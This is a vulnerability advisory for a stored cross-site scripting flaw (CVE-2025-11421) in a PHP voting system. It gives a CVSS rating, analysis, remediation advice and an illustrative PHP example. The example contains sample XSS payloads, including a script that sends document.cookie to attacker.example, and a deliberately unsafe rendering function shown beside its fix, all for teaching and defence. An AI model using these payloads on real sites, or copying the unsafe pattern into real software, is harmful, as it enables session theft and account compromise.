code-projects Voting System CVE-2025-11421
Severity: LOW (rating by source)
CVSS vector (NVD): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
Description (CVE.org)
A flaw has been found in code-projects Voting System 1.0. The affected element is an unknown function of the file /admin/candidates_edit.php. This manipulation of the argument Firstname/Lastname/Platform causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used.
Analysis (AI)
Stored cross-site scripting (XSS) in code-projects Voting System 1.0 allows an authenticated user with low privileges to inject script via the Firstname, Lastname or Platform parameters of /admin/candidates_edit.php. The payload is saved with the candidate record and executes in the browser of any user, typically an administrator, who later views that record. Triggering it requires a victim to view the page (UI:P), and the impact rated by NVD is limited to integrity (VI:L) of what administrators see. Exploit code is publicly available on GitHub; the EPSS score of 0.03% indicates a low predicted probability of exploitation in the wild, not evidence that the published PoC is unused.
Technical Context (AI)
The vulnerability is a cross-site scripting flaw (CWE-79) in a PHP-based voting system web application. The affected endpoint /admin/candidates_edit.php fails to sanitize or encode user-supplied input in the candidate profile fields (Firstname, Lastname, Platform) before storing them and later rendering them into HTML. Because the fields belong to a persisted candidate record, this behaves as stored XSS: the injected JavaScript executes whenever an administrator or other user views the manipulated record, not only in the response to the request that planted it. The attack vector is network-accessible (AV:N) and requires only low-privilege authentication (PR:L), which suggests that the candidate-edit function, despite living under /admin/, is reachable by any authenticated account and that the application performs no adequate role check or input validation on this path.
Remediation (AI)
The primary remediation is to upgrade to a patched version if the vendor (code-projects.org) publishes one; no patched version number is confirmed in the available data. Until then, apply the following compensating controls:
(1) Apply HTML entity encoding (htmlspecialchars() with the ENT_QUOTES flag and an explicit UTF-8 charset in PHP) to every place the Firstname, Lastname and Platform fields are echoed: the edit form's input values, the candidate listing and any ballot or results page. The fix must cover every output location, not only candidates_edit.php, because the injected value is stored and rendered elsewhere.
(2) Add server-side allow-list validation for these fields (for example, names limited to letters, spaces, apostrophes and hyphens with a bounded length). Stripping script tags or event handlers with a deny-list is easy to bypass and should not be relied on; client-side checks are a usability aid only, since an attacker submits requests directly.
(3) Restrict access to /admin/candidates_edit.php to administrative accounts with a verified need, using role-based access control (RBAC), to reduce the pool of potential attackers. This is a mitigation rather than a fix: an administrator account can still plant a payload that other administrators will execute.
(4) Send a Content Security Policy header with script-src 'self' (and without 'unsafe-inline') so that inline scripts and on* event handlers are blocked even where an encoding bug remains; test before deploying, because the policy also blocks the application's own inline JavaScript.
These are PHP source changes and take effect on the next request without an application restart. Output encoding addresses the root cause (improper output encoding); input validation alone is insufficient, because legitimately stored data can later be displayed in contexts where encoding is essential. To verify the fix, submit a harmless marker such as <b>test</b> in each field from a low-privileged account and confirm that every page showing the candidate renders it as literal text rather than bold.
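The following is an added example and not code from code-projects Voting System; it shows the unsafe echo pattern that produces this class of bug next to the hardened form described in the remediation above. Only the field names Firstname, Lastname and Platform come from the advisory; the function names, the sample record and the attacker input are constructed for illustration.

```php
<?php
// Added example (not code from code-projects Voting System): a minimal
// candidate-edit renderer showing the unsafe pattern behind CWE-79 and the
// hardened pattern. Field names come from the advisory; everything else
// (function names, sample values, CSP text) is assumed for illustration.
declare(strict_types=1);

// Constructed attacker-controlled input, as it would arrive in $_POST from a
// low-privileged account submitting /admin/candidates_edit.php.
$submitted = [
    'Firstname' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'Lastname'  => 'Doe" onmouseover="alert(1)',
    'Platform'  => "<img src=x onerror=alert('platform')>",
];

// --- Vulnerable pattern: stored values echoed raw into HTML ------------------
// Every concatenation below is a separate injection point; the attribute value
// is the one most often forgotten, which is why ENT_QUOTES matters.
function render_candidate_unsafe(array $c): string
{
    return '<td>' . $c['Firstname'] . ' ' . $c['Lastname'] . '</td>'
         . '<td>' . $c['Platform'] . '</td>'
         . '<input name="Lastname" value="' . $c['Lastname'] . '">';
}

// --- Hardened pattern: encode for the HTML context at output time ------------
// ENT_QUOTES encodes both quote styles so attribute values cannot be escaped;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of silently returning ''.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_candidate_safe(array $c): string
{
    return '<td>' . e($c['Firstname']) . ' ' . e($c['Lastname']) . '</td>'
         . '<td>' . e($c['Platform']) . '</td>'
         . '<input name="Lastname" value="' . e($c['Lastname']) . '">';
}

// --- Server-side allow-list validation (in addition to, not instead of, e()) -
// Names: letters, combining marks, spaces, apostrophes and hyphens, 1-64 chars.
// Platform: free text with a length bound; encoding makes it safe, stripping
// tags would not. Limits are assumed, adjust to the deployment's needs.
function validate_candidate(array $in): array
{
    $errors = [];
    foreach (['Firstname', 'Lastname'] as $f) {
        $v = trim((string)($in[$f] ?? ''));
        if ($v === '' || mb_strlen($v) > 64 || !preg_match('/^[\p{L}\p{M}\' \-]+$/u', $v)) {
            $errors[] = "$f: letters, spaces, apostrophes and hyphens only (1-64 characters)";
        }
    }
    $p = (string)($in['Platform'] ?? '');
    if (mb_strlen($p) > 2000) {
        $errors[] = 'Platform: at most 2000 characters';
    }
    return $errors;
}

// --- CSP as defense in depth (must be sent before any output) ---------------
// script-src 'self' blocks inline <script> and on* handlers even if an encoding
// bug remains; it also blocks the application's own inline JS, so test first.
if (PHP_SAPI !== 'cli') {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

// Demonstration when run from the command line: php candidates_edit_example.php
echo "Validation errors for the constructed input:\n";
foreach (validate_candidate($submitted) as $err) {
    echo "  - $err\n";
}
echo "\nUnsafe rendering (script and event handler survive):\n",
     render_candidate_unsafe($submitted), "\n";
echo "\nSafe rendering (everything is inert text):\n",
     render_candidate_safe($submitted), "\n";
```

Running it from the CLI prints the validation failures for the first and last name, then the two renderings side by side: in the unsafe output the <script> element and the onmouseover handler are intact, in the safe output they appear as &lt;script&gt; and &quot; sequences that the browser shows as text. The validation deliberately rejects the constructed names rather than cleaning them, so an attacker receives an error instead of a partially stripped payload that might still be dangerous.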